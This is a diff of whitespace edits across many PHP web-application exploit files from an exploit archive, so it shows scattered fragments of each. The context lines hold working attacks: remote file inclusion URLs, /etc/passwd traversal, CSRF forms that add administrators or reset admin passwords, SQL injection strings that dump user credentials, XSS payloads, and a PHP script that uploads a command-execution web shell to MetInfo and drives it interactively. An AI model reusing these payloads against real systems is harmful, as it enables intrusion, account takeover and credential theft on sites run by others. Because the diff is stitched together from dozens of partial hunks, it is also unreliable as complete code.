-#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
+#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
- +++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +++++++++++++++++++++++++++++++++++++++++++++++++++++
 Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL]
- +++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +++++++++++++++++++++++++++++++++++++++++++++++++++++
 A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers

exploits/php/webapps/14819.html

@@ -8,24 +8,24 @@
 <body bgcolor="#000000" style="background-attachment: fixed" background="http://www.sa-virus.com/reno/bg.gif">
 <p
  align="left"><font size="5" 
-color="#FFFFFF"><b>                                
+color="#FFFFFF"><b>                                
+ 
                
-               
 </b></font><b><font color="#FFFFFF" size="5">Pc4Uploader - [XSRF ] Add Admin 
 Exploit<br>
-                                                                  
+                                                                  
-    
+    
 Author : RENO<br>
-                                                         
+                                                         
-     TeaM : SauDi ViRuS TeaM<br>
+     TeaM : SauDi ViRuS TeaM<br>
-                                                           
+                                                           
-    
+    
 Site : <a href="http://WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM</a><br>
-                                                       
+                                                       
-      
+      
 Email : R7e@HoTMaiL.coM</font></b></p>
-<p align="center"> </p>
+<p align="center"> </p>
-<p align="center"> </p>
+<p align="center"> </p>
 
 <svt>
 <center>

exploits/php/webapps/14822.txt

@@ -1,6 +1,6 @@
 # Exploit Title: [DiY-CMS 1.0 Remote File Inclusion ] 
 # Date: [28-8-2010] 
-# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
+# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
 # Software Link: [http://webscripts.softpedia.com/scriptDownload/DiY-CMS-Download-63258.html] 
 # Version: [v 1.0 ] 
 # Tested on: [Windows XP] 

exploits/php/webapps/14896.txt

@@ -1,6 +1,6 @@
 # Exploit Title: [iJoomla.Magazine.v.3.0.1 Remote File Inclusion ] 
 # Date: [5-9-2010] 
-# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
+# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
 # Software Link: [http://www.ijoomla.com/ijoomla-magazine/ijoomla-magazine/index/] 
 # Version: [v 3.0.1 ] 
 # Tested on: [Windows XP] 
@@ -9,4 +9,4 @@
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Exploit: http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL]
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[~] 
-Greetings:  No
+Greetings:  No

exploits/php/webapps/14931.php

@@ -2,17 +2,17 @@
 Date : Sep 6, 2010
 Author: Saxtor {Location: South America (Guyana)}
 Email: admin@saxtorinc.com
-Category::  Web Applications  
+Category::  Web Applications  
 Verison: 5.5
 
 
 suffers a directory traversal
-vulnerability.  This vulnerability could allow
+vulnerability.  This vulnerability could allow
 attackers to read arbitrary files => 
 ------------------------------
 http://localhost/Javabridge/source.php?source=/etc/passwd
 ------------------------------
- */
+ */
 <?php
 
  /**

exploits/php/webapps/14965.txt

@@ -1,6 +1,6 @@
 [x] Exploit Title: [FCMS_2.2.3 Remote File Inclusion ] 
 [x] Date: 10-9-2010] 
-[x] Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
+[x] Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
 [x] Software Link: [http://www.familycms.com/getstarted.php] 
 [x] Version: [v 2.2.3 ] 
 [x]Tested on: [Windows XP] 
@@ -11,4 +11,4 @@
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 [x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/settings.php?current_user_id=[SHeLL]
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
-[x]Greetings:  No Greet
+[x]Greetings:  No Greet

exploits/php/webapps/15389.php

@@ -19,34 +19,34 @@ set_time_limit(0);
 ini_set("default_socket_timeout", 5);
 function http_send($host, $packet)
 {
- $sock = fsockopen($host, 80);
+ $sock = fsockopen($host, 80);
- while (!$sock)
+ while (!$sock)
- {
+ {
-  print "\n[-] No response from {$host}:80 Trying again...";
+  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
+  $sock = fsockopen($host, 80);
- }
+ }
- fputs($sock, $packet);
+ fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
+ fclose($sock);
- return $resp;
+ return $resp;
 }
 print "\n+------------------------------------------------------------+";
-print "\n|        MetInfo 3.0 File Upload (fckeditor) sh3n            |";
+print "\n|        MetInfo 3.0 File Upload (fckeditor) sh3n            |";
 print "\n+------------------------------------------------------------+\n";
 if ($argc < 2)
 {
- print "\nUsage......: php $argv[0] metinfo.pe path";
+ print "\nUsage......: php $argv[0] metinfo.pe path";
- print "\nExample....: php $argv[0] localhost /fckeditor/\n";
+ print "\nExample....: php $argv[0] localhost /fckeditor/\n";
- die();
+ die();
 }
 $host = $argv[1];
 $path = $argv[2];
-$data  = "--xSsT0rm\r\n";
+$data  = "--xSsT0rm\r\n";
 $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh3n.php.pdf\"\r\n";
 $data .= "Content-Type: application/octet-stream\r\n\r\n";
 $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
 $data .= "----xSsT0rm--\r\n";
-$packet  = "POST {$path}/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.0\r\n";
+$packet  = "POST {$path}/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.0\r\n";
 $packet .= "Host: {$host}\r\n";
 $packet .= "Content-Length: ".strlen($data)."\r\n";
 $packet .= "Content-Type: multipart/form-data; boundary=xSsT0rm\r\n";
@@ -58,19 +58,19 @@ else print "\n[-] Shell uploaded to {$html[2]}...have phun!\n";
 define(STDIN, fopen("php://stdin", "r"));
 while(1)
 {
- print "\nsh3n-box# ";
+ print "\nsh3n-box# ";
- $cmd = trim(fgets(STDIN));
+ $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
+ if ($cmd != "exit")
- {
+ {
-  $packet = "GET {$path}upload/{$html[3]} HTTP/1.0\r\n";
+  $packet = "GET {$path}upload/{$html[3]} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
+  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
+  $packet.= "Connection: close\r\n\r\n";
-  $output = http_send($host, $packet);
+  $output = http_send($host, $packet);
-  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $output);
+  $shell = explode("_code_", $output);
-  print "\n{$shell[1]}";
+  print "\n{$shell[1]}";
- }
+ }
- else break;
+ else break;
 }
 ?>

exploits/php/webapps/15470.txt

@@ -8,4 +8,4 @@ Sql Injection :
 http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00
 ################################################################################################################
 Thanks Cyber-Warrior.org  &  AKINCILAR 
-################################################################################################################ 
+################################################################################################################

exploits/php/webapps/15472.txt

@@ -18,7 +18,7 @@ Description: Change the admin password of the admin panel of oscommerce.And then
 <form name="administrator" action="http:/server/linktoadminpanel/administrators.php/login.php?aID=1&action=save" method="post"> Change Admin Pass
     Username<br><input type="text" name="username" value="admin">
     <br>Password<br><input type="password" name="password" maxlength="40"></td> 
-    <br><input type="submit" alt="Update" title=" Update " value="Change It!">     <a href="http://server/linktoadminpanel/administrators.php/login.php?aID=1">    </a>
+    <br><input type="submit" alt="Update" title=" Update " value="Change It!">     <a href="http://server/linktoadminpanel/administrators.php/login.php?aID=1">    </a>
 </form> 
 </BODY></HTML>
 ----------------------------

exploits/php/webapps/15510.txt

@@ -1,6 +1,6 @@
 [+]Exploit Title: [awcm v2.1 final Remote File Inclusion]
 [+]Date: [13-11-2010]
-[+]Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
+[+]Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
 [+]Software Link: [www.awcm-cms.com]
 [+]Version: [v2.1]
 [+]CVE :I'M IRaQi ~ Hacker town of Musayyib
@@ -12,4 +12,4 @@ http://sourceforge.net/projects/awcm/files/
 [+]Exploit: http://target/awcm v2.1 final/awcm/header.php?theme_file=[EV!L] 
 
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-Greetings:  No Greet  !_!
+Greetings:  No Greet  !_!

exploits/php/webapps/15685.html

@@ -104,7 +104,7 @@ Hide Email ? (Email Göster Gizle)
 	<td class="liste-veri3" bgcolor="#ffffff" align="left">
 <label style="cursor: pointer;">
 <input type=radio name="posta_goster" value="1" >
-Evet</label>  
+Evet</label>  
 <label style="cursor: pointer;">
 <input type="radio" name="posta_goster" value="0" checked="checked">
 Hayýr</label>
@@ -115,7 +115,7 @@ Doðum tarihi
 	<td class="liste-veri3" bgcolor="#ffffff" align="left">
 <label style="cursor: pointer;">
 <input type="radio" name="dogum_tarihi_goster" value="1" checked="checked">
-Evet</label>  
+Evet</label>  
 
 <label style="cursor: pointer;">
 <input type="radio" name="dogum_tarihi_goster" value="0" >
@@ -127,7 +127,7 @@ Sehir Göster Gizle
 	<td class="liste-veri3" bgcolor="#ffffff" align="left">
 <label style="cursor: pointer;">
 <input type="radio" name="sehir_goster" value="1" checked="checked">
-Evet</label>  
+Evet</label>  
 
 <label style="cursor: pointer;">
 
@@ -145,7 +145,7 @@ Online - Offline Göster Gizle
 <label style="cursor: pointer;">
 
 <input type="radio" name="gizli" value="0" checked="checked">
-Evet</label>  
+Evet</label>  
 
 <label style="cursor: pointer;">
 <input type="radio" name="gizli" value="1" >

exploits/php/webapps/15824.txt

@@ -4,7 +4,7 @@ Special thanks to Eric Heikkinen for patching these quickly.
 
 Blind SQL Injection
 http://host/pligg_1.1.2/search.php?adv=1&status=
-'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
+'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
 +&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0
 
 XSS:

exploits/php/webapps/15838.php

@@ -16,7 +16,7 @@ The target must be a link to the document root of OpenClassifieds<br>
 (If the exploit doesn't immediately reload then blind sqli is
 required,  which will take a few minutes  ;)<br>
 <form>
-	Target:  <input size=128 name=target value="http://localhost/"><br>
+	Target:  <input size=128 name=target value="http://localhost/"><br>
 	Payload:<input size=128 name=xss value="<script>alert('xss')</script>"><br>
 	<input type=submit value="Attack">
 </form><br>

exploits/php/webapps/15857.txt

@@ -401,7 +401,7 @@ report.php
 		$url = " .$_SERVER[PHP_SELF]";
 		$count = $row[0];
 		$perpage = 40;list($pagertop, $pagerbottom, $limit) = pager($perpage, $count, $url);
-		print("<BR><b> Current Email Bans ($count)</b>\n");
+		print("<BR><b> Current Email Bans ($count)</b>\n");
 
 		$url isn't filtered and pager() does not filter anything. So it's vulnerable to XSS.
 		

exploits/php/webapps/15902.html

@@ -27,11 +27,11 @@ expl:
     </tr>
     <tr>
       <td align="left" valign="top">Root URL address of your site (with end slash)</td>
-      <td align="left" valign="top"> </td>
+      <td align="left" valign="top"> </td>
     </tr>
     <tr>
       <td align="left" valign="top"><input name="home" type="text" class="validate[required] field" id="home" style="width:99%" value="http://www.dgdfgfgdfgdgdfgfdfgdf.com" /></td>
-      <td align="left" valign="top"> </td>
+      <td align="left" valign="top"> </td>
     </tr>
     <tr>
       <td colspan="2" align="left" valign="top">Your slogan</td>
@@ -90,19 +90,19 @@ expl:
     </tr>
     <tr>
       <td align="left" valign="top">Password-----just 6 characters</td></td>
-      <td align="left" valign="top"> </td>
+      <td align="left" valign="top"> </td>
     </tr>
     <tr>
       <td align="left" valign="top"><input name="pass" type="password" class="validate[required,length[6,24]] field" id="pass" style="width:99%" value="123456" /></td>
-      <td align="left" valign="top"> </td>
+      <td align="left" valign="top"> </td>
     </tr>
     <tr>
       <td align="left" valign="top">Password again-----just 6 characters</td></td>
-      <td align="left" valign="top"> </td>
+      <td align="left" valign="top"> </td>
     </tr>
     <tr>
       <td align="left" valign="top"><input name="passco" type="password" class="validate[required,confirm[pass]] field" id="passco" style="width:99%" value="123456" /></td>
-      <td align="left" valign="top"> </td>
+      <td align="left" valign="top"> </td>
     </tr>
     <tr>
       <td colspan="2" align="left" valign="top"><input name="installed" type="hidden" id="installed" value="true" />
@@ -113,7 +113,7 @@ expl:
       <td colspan="2" align="center" valign="top"><input type="submit" name="button" id="button" value="Save" class="save" /></td>
     </tr>
     <tr>
-      <td colspan="2" align="center" valign="top"> </td>
+      <td colspan="2" align="center" valign="top"> </td>
     </tr>
   </table>
 </form>

exploits/php/webapps/16060.txt

@@ -12,12 +12,12 @@
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
 Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
 Xarnuz, Truenex
- 
+ 
- 
+ 
- 
+ 
 [POC]
 http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
- 
+ 
 http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
 
 [SQL Injection]

exploits/php/webapps/16116.txt

@@ -17,7 +17,7 @@ Xarnuz, Truenex, TsunamiBoom, _tty0, Big, Sunplace, Killerboy,Erick
 Jordan,Animacco,
 yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El
 Rodrix, l0ve, her0
- 
+ 
 
 [Qcodo Exploit]
 

exploits/php/webapps/16127.txt

@@ -6,7 +6,7 @@
 # Software: http://www.telematica.com.ar/tcms.asp
 # http://www.telematica.com.ar/portfolio.asp
 # Tested on: Linux
- 
+ 
 [Comment]
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
 Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
@@ -15,8 +15,8 @@ Jordan,Animacco ,
 yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El
 Rodrix, l0ve, NetT0xic,
 Gusan0r, Sabertrail, Maxi Soler. Darioxchx,r0dr1,Zer0-Zo0rg
- 
+ 
-  
+  
 [Authentication Bypass]
 
 http://path/admin/

exploits/php/webapps/17170.txt

@@ -75,7 +75,7 @@ EZ-Shop is prone to SQL Injection due to insufficent user supplied input sanizat
         <tr>
           <td width="50%"><table width="100%" height="170" border="0" cellpadding="0" cellspacing="1" bordercolor="#CCCCCC" class="proborder">
             <tr>
-              <td height="25" colspan="2" class="fntstyle"> <?php echo $resprname1;?></td>
+              <td height="25" colspan="2" class="fntstyle"> <?php echo $resprname1;?></td>
 
 [/code]
 

exploits/php/webapps/17562.php

@@ -103,7 +103,7 @@ $post_bd = array(
     "description"=>"bla bla bla ,,,","cat"=> 1,
     "day"=> 22,"month"=> 11,"year"=>2011,
     "picture"=>"@".realpath("dz.php"),
-    "submit"=>"  Update Event  ");
+    "submit"=>"  Update Event  ");
 
 # post backdoor & check
 echo (!eregi("<strong>Errors</strong>", DzCURL($target."admin_events.php",$post_bd,$header))) ? "# Backdoor uploaded :D\n":die("# Failed : can't upload Backdoor");

exploits/php/webapps/18236.txt

@@ -1,11 +1,11 @@
 # Exploit Title: Pixie v1.04 blog post CSRF
-# Google Dork: # Date: 11-Dec-2011
+# Google Dork: # Date: 11-Dec-2011
 # Author: hackme
-# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip 
+# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip 
 # Version: 1.04# Tested on: Linux Ubuntu 10.10
 # CVE :
 [+] TH4NKZ T0: broiosen,ReGun and hackgame.it
-[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post 
+[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post 
 [+] Post Method
 [+] exploit:
 

exploits/php/webapps/18466.txt

@@ -7,15 +7,15 @@
 # http://www.tubeace.com
 # Tested on: Linux
 # Dork: "?viewStandard=0"
-  
+  
 [Comment]
 Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
 Maximiliano Soler
-    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
+    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
 InyeXion
-    her0, r0dr1 y demas user de RemoteExecution 
+    her0, r0dr1 y demas user de RemoteExecution 
-    www.remoteexecution.info www.remoteexcution.com.ar 
+    www.remoteexecution.info www.remoteexcution.com.ar 
-    #RemoteExecution Hacking Group
+    #RemoteExecution Hacking Group
 
 [PoC]
 

exploits/php/webapps/18495.html

@@ -11,7 +11,7 @@
 
 <center><b><font face="Tahoma" size="5">[ <font color="#FF0000">Priv8</font> ]
 <span dir="ltr"><font color="#FF0000">Almnzm 2.4</font><font color="#ffffff">
-</font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font>
+</font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font>
 <font color="#FF0000" face="Tahoma" size="2">Add New Admin :D</font></b></p>
 <p align="center"><b><font face="Tahoma">By: <font color="#FF0000">HaNniBaL 
 KsA</font> (<font color="#FF0000">HK</font>)</font></b></p><center>

exploits/php/webapps/18711.txt

@@ -77,7 +77,7 @@ setTimeout('document.test.submit()',0);
     <input name="password2" type="text" value="dz0"/><!-- Confirm Password -->
   </p>
   <p><input type="submit" name="Change" value="Change" />
-   </p>
+   </p>
 </form>
 </body>
 </html>

exploits/php/webapps/18742.php

@@ -113,7 +113,7 @@ Greets : Sho0ter  , Net_spy , khanisgr8 , CROSS & All Hackw0rms Crew / Members
    <!-- buttons start -->
    <table width="100%" cellpadding="5" border="0">
    		<tr>
-   			<td width="80"> </td>
+   			<td width="80"> </td>
 			<td align="right">
    				<input type="submit" name="Save" value="Save" style="width:80px;">
 			</td>

exploits/php/webapps/18743.txt

@@ -7,23 +7,23 @@
 # http://www.mediaxxxscript.com/
 # Tested on: Linux
 # Dork: "Powered by MediaXxx Mobile"
-   
+   
 [Comment]
 Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
 Maximiliano Soler
-    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
+    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
 InyeXion,ksha,zerial,
-    her0, r0dr1 y demas user de RemoteExecution
+    her0, r0dr1 y demas user de RemoteExecution
-    wwwremoteexecution.info www.remoteexcution.com.ar
+    wwwremoteexecution.info www.remoteexcution.com.ar
-    #RemoteExecution Hacking Group
+    #RemoteExecution Hacking Group
- 
+ 
 [PoC]
- 
+ 
 http://localhost/mobile/search?query=[SQL Injection]
- 
+ 
- 
+ 
 [DEMO]
- 
+ 
 http://server/mobile/search?query=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C122%2C108%2C118%2C58%29%2C%28CASE%20WHEN%20%28EXISTS%28SELECT%209%20FROM%20information_schema.TABLES%29%29%20THEN%201%20ELSE%200%20END%29%2CCHAR%2858%2C113%2C103%2C116%2C58%29%29%2C%20NULL%2C%20NULL%23%20AND%20%28%27CTgy%27%3D%27CTgy
 
 -------------------------

exploits/php/webapps/18900.txt

@@ -102,15 +102,15 @@ Content-Type: text/html
          </tr> <tr><td>Comment:</td><td>
 <input name="comment" type="text" size=40 value=""><script>alert(2)</script>"/>
 </td><td>Last IP:NONE<br></td>
-<tr><td> </td><td></td></tr>
+<tr><td> </td><td></td></tr>
-          <tr><td> </td><td>
+          <tr><td> </td><td>
-          <input type="submit" name="action" class="bluebox" value="Update" /> 
+          <input type="submit" name="action" class="bluebox" value="Update" /> 
           <input type="submit" name="action" class="bluebox" value="Delete" 
             onClick="javascript:return confirm('Really DELETE this end-device record?')"
             />
-          </td></tr>'<tr><td> </td><td></td></tr>
+          </td></tr>'<tr><td> </td><td></td></tr>
-<tr><td> </td><td></td></tr>
+<tr><td> </td><td></td></tr>
-</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
+</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
 <tr><td colspan=3 bgcolor="#DEDEDE"><b>Administrative information</b><tr><td>Inventory:<td>
 <tr><td>Classification:
 

exploits/php/webapps/19549.txt

@@ -18,11 +18,11 @@ Project CHAP Security
 Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
 Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
 InyeXion, ksha, zerial,LinuxFer, Scorp
-    her0, r0dr1 y demas user de RemoteExecution
+    her0, r0dr1 y demas user de RemoteExecution
-    www.remoteexecution.info www.remoteexcution.com.ar
+    www.remoteexecution.info www.remoteexcution.com.ar
-    #RemoteExecution Hacking Group
+    #RemoteExecution Hacking Group
+
  
- 
 [PoC]
 
 http://localhost/classified-listing.php?catId=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--

exploits/php/webapps/20055.txt

@@ -8,15 +8,15 @@ Date: 23/07/2012
 # www.chap.cl
 # Este Advisory fue reportado por Daniel Godoy, integrante deProject CHAP Security
 # be secured /stay secure
-# contacto@chap.cl 
+# contacto@chap.cl 
 
 [Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,Maximiliano Soler, Pablin77,_tty0,
-Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp    her0, r0dr1 y demas user de RemoteExecution   
+Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp    her0, r0dr1 y demas user de RemoteExecution   
-www.remoteexecution.info www.remoteexcution.com.ar   
+www.remoteexecution.info www.remoteexcution.com.ar   
-#RemoteExecution Hacking Group   
+#RemoteExecution Hacking Group   
 
 [PoC]
-find Squid's access.log file path and insert "> Example: ">PWNED!
+find Squid's access.log file path and insert "> Example: ">PWNED!
 
 http://server/mysar/www/?a=administration
 

exploits/php/webapps/20671.html

@@ -9,5 +9,5 @@
  
  <form method="POST" action="http://server/admin/admin_settings.php" enctype="multipart/form-data">
  <input type="hidden" name="sel" value="save_admin_pass"><table cellpadding="3" cellspacing="0"><tr><td width="150"><font class="main_header_text">New Password:</font></td><td><input type="password" name="new_pass" value="" style="width: 200px;"></td></tr><tr><td>
- <font class="main_header_text">Confirm New Password:</font></td><td><input type="password" name="new_pass_confirm" value="" style="width: 200px;"></td></tr><tr><td> </td><td>
+ <font class="main_header_text">Confirm New Password:</font></td><td><input type="password" name="new_pass_confirm" value="" style="width: 200px;"></td></tr><tr><td> </td><td>
  <input type="submit" value="Save"></td></tr></table></form></div>

exploits/php/webapps/24953.txt

@@ -39,14 +39,14 @@ Vulnerable page : http://target.com/[path]/admin/file_io.php
 			<td width="300" height="50" align="center" valign="middle">
 			<font color="#808080">New Username:</font>
 			</td>
-			<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40">  </td>
+			<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40">  </td>
 		</tr>
 
 			</td>
 		<tr>
 			<td width="300" height="62" align="center" valign="middle">
 			<font color="#808080">New Password: </font> </td>
-			<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40">  </td>
+			<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40">  </td>
 		</tr>
 		<tr>
 			<td height="50" colspan="2" align="center" valign="middle" ><p>

exploits/php/webapps/25245.txt

@@ -77,7 +77,7 @@ type="password" value="abdotv"/></td>
                                   </tr>
 
                                   <tr>
-                                    <td valign="top"> </td>
+                                    <td valign="top"> </td>
                                     <td><table  border="0" cellspacing="0"
 cellpadding="2">
                                         <tr>
@@ -86,7 +86,7 @@ cellpadding="2">
                                           <input type="submit"
 value="Submit" name="btn_submit" >
  </td>
-                                          <td width="6"> </td>
+                                          <td width="6"> </td>
                                         </tr>
                                       </table></td>
                                   </tr>
@@ -109,7 +109,7 @@ value="Submit" name="btn_submit" >
         <td width="3%" align="left" background="images/layoutadmin_109.jpg"
 style="background-repeat:repeat-x" ><img src="images/layoutadmin_108.jpg"
 width="33" height="20" alt="" /></td>
-        <td   background="images/layoutadmin_109.jpg"> </td>
+        <td   background="images/layoutadmin_109.jpg"> </td>
         <td width="3%" align="right"
 background="images/layoutadmin_109.jpg" style="background-repeat:repeat-x"
 ><img src="images/layoutadmin_111.jpg" width="33"  height="20" alt=""/></td>

exploits/php/webapps/26366.txt

@@ -59,9 +59,9 @@ Error: You have an error in your SQL syntax; check the manual that corresponds t
 AND `glpi_tickets`.`is_deleted` = 0
 ' at line 3
 Backtrace :
-/var/www/html/glpi/inc/db.function.php :288		DBmysql->query()
+/var/www/html/glpi/inc/db.function.php :288		DBmysql->query()
-/var/www/html/glpi/inc/commonitilobject.class.php :362		countElementsInTable()
+/var/www/html/glpi/inc/commonitilobject.class.php :362		countElementsInTable()
-/var/www/html/glpi/ajax/ticketassigninformation.php :66		CommonITILObject->countActiveObjectsForTech()
+/var/www/html/glpi/ajax/ticketassigninformation.php :66		CommonITILObject->countActiveObjectsForTech()
 /var/www/html/glpi/ajax/ticketassigninformation.php
 
 
@@ -98,11 +98,11 @@ WHERE `ext` LIKE \'1\'\'
 AND `is_uploadable`=\'1\'
 Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 3
 Backtrace :
-/var/www/html/glpi/inc/document.class.php :1232		DBmysql->query()
+/var/www/html/glpi/inc/document.class.php :1232		DBmysql->query()
-/var/www/html/glpi/inc/document.class.php :1088		Document::isValidDoc()
+/var/www/html/glpi/inc/document.class.php :1088		Document::isValidDoc()
-/var/www/html/glpi/inc/document.class.php :275		Document::uploadDocument()
+/var/www/html/glpi/inc/document.class.php :275		Document::uploadDocument()
-/var/www/html/glpi/inc/commondbtm.class.php :878		Document->prepareInputForUpdate()
+/var/www/html/glpi/inc/commondbtm.class.php :878		Document->prepareInputForUpdate()
-/var/www/html/glpi/front/document.form.php :99		CommonDBTM->update()
+/var/www/html/glpi/front/document.form.php :99		CommonDBTM->update()
 /var/www/html/glpi/front/document.form.php
 
 
@@ -121,9 +121,9 @@ Backtrace :
 SQL: SHOW TABLES LIKE \'%glpi_users\'%\'
 Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
 Backtrace :
-/var/www/html/glpi/glpi/inc\dbmysql.class.php :365		DBmysql->query()
+/var/www/html/glpi/glpi/inc\dbmysql.class.php :365		DBmysql->query()
-/var/www/html/glpi/inc/db.function.php :1182		DBmysql->list_tables()
+/var/www/html/glpi/inc/db.function.php :1182		DBmysql->list_tables()
-/var/www/html/glpi/ajax/comments.php :47		TableExists()
+/var/www/html/glpi/ajax/comments.php :47		TableExists()
 /var/www/html/glpi/ajax/comments.php
 
 ======================================================================

exploits/php/webapps/28668.txt

@@ -1,9 +1,9 @@
 source: https://www.securityfocus.com/bid/20202/info
- 
+ 
 BirdBlog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
- 
+ 
 An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
- 
+ 
 BirdBlog 1.4.0 and prior versions are reported vulnerable.
 
 http://www.example.com/[path]/index.php?page=<Script>